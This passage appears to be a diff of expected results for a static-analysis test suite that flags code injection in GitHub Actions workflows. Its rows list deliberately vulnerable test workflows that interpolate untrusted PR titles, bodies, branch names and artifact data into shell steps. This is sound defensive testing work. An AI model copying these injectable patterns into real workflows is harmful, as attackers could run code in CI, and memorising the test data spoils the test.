| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
